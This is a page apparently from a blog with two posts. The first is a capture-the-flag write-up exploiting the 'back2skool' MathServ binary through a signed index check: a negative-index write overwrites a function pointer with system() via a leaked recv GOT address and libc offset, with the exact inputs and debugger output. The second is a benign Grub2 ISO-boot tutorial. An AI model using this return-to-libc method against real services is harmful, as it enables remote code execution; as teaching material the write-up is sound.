	[pid 4359] fork()                                                                   = 4361
	[pid 4359] close(4)                                                                 = 0
	[pid 4359] accept(3, 0, 0, 0x697a0002, 1 <unfinished ...>
	[pid 4361] <... fork resumed> )                                                     = 0
	[pid 4361] getpwnam("back2skool")                                                   = NULL
	[pid 4361] err(-1, 0x804997b, 0x80499b8, 0, 0back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f:
	Failed to find user back2skool: Success
	 <unfinished ...>
	[pid 4361] +++ exited (status 255) +++

In short, getpwnam fails, and the forked child exits. It also prints a conclusive error - the user back2skool is required.

Usually, the first step, when trying to solve a remote challenge is to debug it locally. Of course this is possible as long as we can run the application ourselves.

After we setup the user we can see the following output when connecting:

	$ telnet localhost 31337
	Trying ::1...
	Trying 127.0.0.1...
	Connected to localhost.
	Escape character is '^]'.
	    __  ___      __  __   _____
	   /  |/  /___ _/ /_/ /_ / ___/___  ______   __ v0.01
	  / /|_/ / __ `/ __/ __ \\__ \/ _ \/ ___/ | / /
	 / /  / / /_/ / /_/ / / /__/ /  __/ /   | |/ /
	/_/  /_/\__,_/\__/_/ /_/____/\___/_/    |___/
	===============================================
	Welcome to MathServ! The one-stop shop for all your arithmetic needs.
	This program was written by a team of fresh CS graduates using only the most
	agile of spiraling waterfall development methods, so rest assured there are
	no bugs here!
	
	Your current workspace is comprised of a 10-element table initialized as:
	{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }
	
	Commands:
		read	Read value from given index in table
		write	Write value to given index in table
		func1	Change operation to addition
		func2	Change operation to multiplication
		math	Perform math operation on table
		exit	Quit and disconnect
	exit
	Exiting program!
	Connection closed by foreign host.
	$

The vulnerability

High-level

The output of the program is self-explanatory. Let’s try some commands.

$ telnet localhost 31337
read
Input position to read from:
3

Nothing special.

Input position to read from:
10
Value at position 10: 134519224

We can read past our table!

Input position to read from:
-200
Value at position -200: 0

We can read below our table!

read
Input position to read from:
90000
Connection closed by foreign host.

The program received SIGSEGV and the socket was closed. At least we can crash the program; in fact we are only crashing the child that has been spawned to handle our connection.

But what about write?

$ telnet localhost 31337
write
Input position to write to:
0
Input numeric value to write:
1
Value at position 0: 1

Nothing special.

write
Input position to write to:
10
Table index too large!

Bummer, we cannot write past our table!

write
Input position to write to:
-1
Input numeric value to write:
42
Value at position -1: 42
write
Input position to write to:
-10000 
Input numeric value to write:
999
Connection closed by foreign host.

Heh, we can write below our table!

Low-level

The assembly code, responsible for checking the indices can be viewed below. Read - atoi

As you can not see, there is no check code for the index when we’re doing a read operation.

Write - atoi

For the write operation there is checking using the instruction jle. But jle instruction is used for comparing signed integers. The instruction jbe should be used in this case which compares unsigned integers. You can find more on this wiki article. Probably the original code looks something like this:

int i;
i = atoi(str);
if (i > 9) {
	error();
	exit();
}
do_stuff;

One way to correct the above code is to have an unsigned comparison or check for negative values. Both would work in this case, but then we couldn’t solve this level :-).

In short, the index checking is broken. We can use any index for the read operation and for the write only negative indices. When you can write anything to any address of a program, the rest is just implementation.

The exploit

As explained in the previous section we can modify almost any address from our vulnerable program. In order to choose a right way to exploit the vulnerability, we should gather more information about the environment.

Do we have any RWX place to store the payload?

$ readelf -e ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f 
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
[...]

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x022a8 0x022a8 R E 0x1000
  LOAD           0x002e68 0x0804be68 0x0804be68 0x00204 0x00214 RW  0x1000
  DYNAMIC        0x002e7c 0x0804be7c 0x0804be7c 0x000d8 0x000d8 RW  0x4
  NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x001e94 0x08049e94 0x08049e94 0x000c4 0x000c4 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
  GNU_RELRO      0x002e68 0x0804be68 0x0804be68 0x00198 0x00198 R   0x1
[...]

The short answer is no - there is no RWE section in the binary. We cannot modify a memory that will be executed later. Maybe we can put our exploit in some region and then make this region executable. This means that we should be able to call mprotect or mmap. But we’ll have to do this, without injecting code, but only by changing non-executable data - e.g. stack values. One idea is to use a return-oriented-programming (ROP) approach, but as you will see in a future section, because our program doesn’t use mprotect or mmap (from libc), calling those functions means that we will have to figure out the offsets of those functions in libc first - if we do this, we can have a more straightforward approach by calling system function directly.

Is ASLR enabled?

It is safe to assume that ASLR is enabled. But because we will use some sort of ROP, we don’t care too much about this right now.

Where shall we write?

In order to modify the flow control of the program by only changing non-executable memory, we will have to find an indirect jump and change the value from that specific address. GOT is the starting point for this.

The idea that comes to our mind is: we will write (override) an address of function which is called later from the GOT. The GOT table is always at the same place in the memory (it resides in the binary) but recall, that we’re writing relatively to a buffer (the workspace table). So the next question that comes in our mind is:

Do we know the address of the buffer?

There are three cases where the buffer might be located:

  • on the stack. If ASLR is enabled, figuring out its address can be done by reading an old %ebp, which is possible because we can read parts of the memory relative to the buffer address;
  • on the heap. This is harder to get. But if our buffer is on the heap, and we can alter structures that are used internally by the malloc function (and we can, because the negative offset write) there is a way of exploiting. We can do something like in the case of double-free vulnerability - but it would be a tedious job;
  • declared global (.bss or .data section). The address of the buffer is the same as in the binary, no runtime hazards.

Probably because pwn250 is not the hardest level, the buffer is in the .data section.

Values buffer

Because our buffer is in .data section and we can use negative indices for read and write, we have a good control over the memory below our buffer. Moreover, you can see in the IDA screenshot above, that there’s a math variable. The program is capable of switching from one operation (addition) to another one (multiplication) it does so by changing a pointer to a function. The pointer is in the .bss section.

Indirect jump via math_ptr

I know at this point, one might argue that the authors of the program used this pointer to facilitate the problem solving - it’s true I wouldn’t argue against this - it’s just a game.

So let’s state our idea: we will override a pointer to a function which is called later; the function will be called whenever the math function is called.

First PoC

$ telnet localhost 31337
[...]
math
You haven't set a mode yet!
func1
Setting mode to ADDITION
write
Input position to write to:
-2147483634
Input numeric value to write:
286331153
Value at position -2147483634: 286331153
math
Connection closed by foreign host.
$

Meanwhile, back at the castle.

$ strace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
[...]
[pid  4710] recv(4, "\n", 1, 0)         = 1
[pid  4710] send(4, "Value at position -2147483634: 2"..., 41, 0) = 41
[pid  4710] read(4, "m", 1)             = 1
[pid  4710] read(4, "a", 1)             = 1
[pid  4710] read(4, "t", 1)             = 1
[pid  4710] read(4, "h", 1)             = 1
[pid  4710] read(4, "\r", 1)            = 1
[pid  4710] read(4, "\n", 1)            = 1
[pid  4710] --- SIGSEGV (Segmentation fault) @ 0 (0) ---
Process 4710 detached
$

OK, we’ve got our segmentation fault. Let’s see what was the last instruction pointer.

$ gdb ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f /home/back2skool/core 
[...]
Core was generated by `./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f'.
Program terminated with signal 11, Segmentation fault.
#0  0x11111111 in ?? ()
(gdb) 

Neat! But what are those numbers? We wrote at position -2147483634 value 286331153. The second number is the instruction pointer at which we want to jump with the math function. The first number is computed as follows

  • the base of our buffer (values) is at a fixed address 0x804c040
  • the address at which we want to write is 0x804c078
  • we need to write at position values+0x38
  • giving a positive index (0x38/4) will give an upper bound error
  • the negative index is -(2^31 - (0x38/4)) == -2147483634
  • you can test this by computing 2^33 + 0x804c040-4*(2^31 - (0x38/4)) - because of the way the buffer is addressed (4 bytes values, scaled addressing) the overflow is ignored and the index value wraps around. We need to do wrap around only when we try to access a value above the base address of the vector.

The instruction pointer is the value that we wrote, 0x11111111 in decimal is 286331153, so we’ve managed to modify the flow of the program by doing a write, and we’ve managed to do so in a predictable way.

Second PoC

We are in the following state: we’ve managed to make our program to jump at any location. But where to jump? Because we don’t have any possibility of injecting code, we should rely on the available code. Available code means, our code and the dynamic libraries code which are mapped in our address space.

Let’s inspect again our binary to see what is used from shared libraries.

$ nm -D -u ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f 
         w __gmon_start__
         U __libc_start_main U __stack_chk_fail U accept U atoi U bind
         U chdir U close U err U exit U fork U free U getpwnam U htonl
         U htons U listen U perror U read U recv U send U setgid
         U setgroups U setsockopt U setuid U signal U socket U vasprintf
$ 

Hmm, nothing useful, nothing to execute, nothing to modify the mappings. But hey, if you have access to those functions from libc and because the loader maps the libc to our address space then it means that we have access to other functions from libc, the problem is that we don’t know where they are. A wild idea appears, if we knew where one of the function from libc is, we can compute the rest of them by adding some offsets. There are two problems with this idea: how do we find the offset of a used function and how do we compute the offset of an unused function.

  • finding the address of a used function is simple, we can use the GOT and read the value of the pointer which has been already filled in by the loader. Because of the lazy linking, we only have to be careful to choose a function which has been previously called. We will choose recv for this purpose.

    $ objdump -dS ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f  | grep -A2 recv@plt
    08048980 <recv@plt>:
     8048980:	ff 25 c0 bf 04 08    	jmp    *0x804bfc0

0x804bfc0 is the GOT entry for recv function.

  • finding the relative offset of the function that we want to jump to (e.g. system) is difficult. This offset depends on the version of libc that is used on the target system. To make things simple, we will focus first on exploiting locally - meaning that we have access to our libc file. To compute the offset we only have to find the function entries in libc.

    $ readelf -s /lib/tls/i686/cmov/libc.so.6 | grep ' recv@'
      1124: 000cebf0   118 FUNC    WEAK   DEFAULT   12 recv@@GLIBC_2.0
    $ readelf -s /lib/tls/i686/cmov/libc.so.6 | grep ' system@'
      1398: 00039100   125 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
    $ echo $((0x00039100-0x000cebf0))
    -613104

The offset is -613104, note that it depends on the version of libc, hence the exploit isn’t too reliable. Let’s focus though on exploiting locally and postpone the computation of the remote offset. We will write at the same address as in PoC1 but we will write the value of system function i.e. address_of_recv_function+OFFSET.

$ telnet localhost 31337
read
Input position to read from:
-32
Value at position -32: -1217696784
write
Input position to write to:
-2147483634
Input numeric value to write:
-1218309888
Value at position -2147483634: -1218309888
math
Result of math: -1

Reading from -32 it’s equivalent of reading -32*4 bytes before our buffer. 0x804c040-32*4 is 0x804bfc0, this is the recv GOT entry. -1218309888 is -1217696784-613104.

Hey, it didn’t crashed, that’s a plus! Meanwhile, back at the castle.

$ strace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
[...]
[pid  4901] send(4, "Value at position -2147483634: -"..., 43, 0) = 43
[pid  4901] read(4, "m", 1)             = 1
[pid  4901] read(4, "a", 1)             = 1
[pid  4901] read(4, "t", 1)             = 1
[pid  4901] read(4, "h", 1)             = 1
[pid  4901] read(4, "\r", 1)            = 1
[pid  4901] read(4, "\n", 1)            = 1
[...]
[pid  4902] execve("/bin/sh", ["sh", "-c", ""], [/* 31 vars */]) = 0
[pid  4902] brk(0)                      = 0x9a04000
[...]

We successfully called execve!

Parameters to execve

We are able to run execve but we don’t control the parameters … yet. Let’s see with what parameters execve is called.

$ gdb ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
[...]
Reading symbols from /root/back2skool-3fbcd46db37c50ad52675294f5667909d1f...(no debugging symbols found)...done.
(gdb) set follow-fork-mode child 
(gdb) catch syscall execve 
Catchpoint 1 (syscall 'execve' [11])
(gdb) r
[...]
Catchpoint 1 (call to syscall 'execve'), 0xb7fe2424 in __kernel_vsyscall ()
(gdb) info registers 
eax            0xffffffda	-38
ecx            0xbffff3b4	-1073744972
edx            0xbffff5ac	-1073744468
ebx            0xb7fa5a5a	-1208329638
[...]
(gdb) x/s $ebx
0xb7fa5a5a:	 "/bin/sh"
(gdb) x/5x $ecx
0xbffff3b4:	0xb7fa5a5f	0xb7fa5a57	0x0804c040	0x00000000
0xbffff3c4:	0xb7ead180
(gdb) x/s ((char **)$ecx)[0]
0xb7fa5a5f:	 "sh"
(gdb) x/s ((char **)$ecx)[1]
0xb7fa5a57:	 "-c"
(gdb) x/s ((char **)$ecx)[2]
0x804c040 <values>:	 ""
(gdb) 

Because we’re using system function the first parameters are set accordingly (sh -c) but the actual command ((char **)$ecx)[2]) is empty. You can have a look at execve syscall parameters and the calling convention for it. Here we’re very lucky, the command that is passed to system is our buffer with values, the initial table. Let’s recap our approach:

  • get the address of recv function via GOT
  • set the pointer of math function to system by adding an offset to recv function address
  • set the parameters in the workspace table
  • trigger the exploit by using the math function
  • profit

Getting some output

The only problem was that the communication socket was number 4 and the output went to file descriptor 1, but running the command with >&4 2>&4 appended, did the trick for us.

The offset, the Achilles’ Heel of the exploit

Well, the exploit worked locally, but remote it didn’t.

Recall that when computing the offset of system function in respect to recv function, we were able to access the libc that was used on the target system. A few ideas appeared:

  • try different offsets by gathering as many libcs as possible from well known distros. After one hour of trying all the libc binaries from Ubuntu I start to wonder if I’m on the right track.
  • try random values - this didn’t work at all and it was time consuming (I was already tired and my thinking was bad)
  • get a copy of in use libc - this is a problem, because we cannot do open, in the best case, we might do some send over the socket using as buffer input the libc mapping.
  • hope for the best, and use another challenge (which we already exploited) and download that libc file and hope that this system has the same one.
  • try to do a more intelligent search by matching function entries (push %ebp, mov %esp, %ebp etc.), this would require too much work.
  • use some magical tool/table that I’m not sure it exists.

We used a previous level and was able to download the libc, this libc was identical with the one that was in use by the current challenge, so we were able to compute the offset for the remote system.

I don’t know of any method of doing a reliable return-to-libc attack without knowing the addresses of some functions. Maybe there’s a method of getting all the symbols after knowing the libc base, that would be neat.

The final exploit can be found here.

Conclusion

We’ve presented a way of doing a return-to-libc attack, even though this is a primitive return-to-libc approach, we used a function from libc. We also had to compute the offset of that function using the address of another function - this makes the exploit unreliable.

In the end, it boils down to have the right skill for using the right tools, it’s nothing fancy.

Grub2 and ISO boot

Published on 25 October 2012 by Alexandru Juncu

Grub2 is the next generation Linux bootloader that is trying to replace the “Legacy” Grub version. It is a complete rewrite of Grub 1 and only lately becoming fully featured compared to the old version and even comes with some new interesting features.

The old Grub’s configuration was rather straightforward, everything being done in a configuration file in the grub directory of the /boot partition (it’s a common practice to have /boot mounted on a separate filesystem). In Debian it was usually /boot/grub/menu.lst and in Red Hat /boot/grub/grub.conf (sometimes one being a symlink to the other).

The configuration file for Grub2 is /boot/grub/grub.cfg. But the file itself should never be modified (not even root has write access). Instead, this file is generated by commands like update-grub2. It is generated based on other configuration files like (in Debian) /etc/default/grub, which has things like global configurations, timers and default settings.

The menu entries for the operating systems themselves are generated based on files in the /etc/grub.d/ directory (in Debian). An interesting feature of Grub2 is the fact that these files are actually Bash scripts. OS entries don’t need to be hard coded, but can be scripted. One such script is the 10_linux file that detects any new kernel image in the /boot directory and writes a new entry for it without having to manually add it. Manual entries can also be written in these files (usually in the 40_custom script file).

An interesting new feature in Grub2 is the possibility to boot from an ISO file. A LiveCD can be stored in an iso file on disk and loaded by grub without having to burn it onto CD or having to boot the normal system first. A menu entry for ISO booting would look like this:

menuentry "Ubuntu LiveCD" {
        loopback loop (hd0,1)/boot/iso/ubuntu-12.04-desktop-i386.iso
        linux (loop)/casper/vmlinuz boot=casper :iso-scan/filename=/boot/iso/ubuntu-12.04-desktop-i386.iso noprompt noeject
        initrd (loop)/casper/initrd.lz
}

Based on the previous ideas, here’s a way to configure grub to make an entry for every .iso file that you have in a specified directory. First, create a directory to store the .iso files (ex. /boot/iso/) and move your Live CDs there.

Next, make a script in the /etc/grub.d/ directory. Let’s call it 42_iso (the number in front dictates the order in which the scripts are executed).

#!/bin/bash

ISO_DIR="/boot/iso/"

for iso in $(ls $ISO_DIR*.iso); do
	echo "menuentry \"$iso\" {"
	echo "set isofile=\"$iso\""
	echo "loopback loop (hd0,1)\$isofile"
	echo "linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=\$isofile noprompt noeject"
	echo "initrd (loop)/casper/initrd.lz"
	echo "}"

done

Don’t forget to give it executable access. Then run the update-grub2 command to generate the Grub2 configuration file.

chmod +x /etc/grub.d/42_iso
update-grub2

Thanks to doraz for suggesting ISO booting with Grub.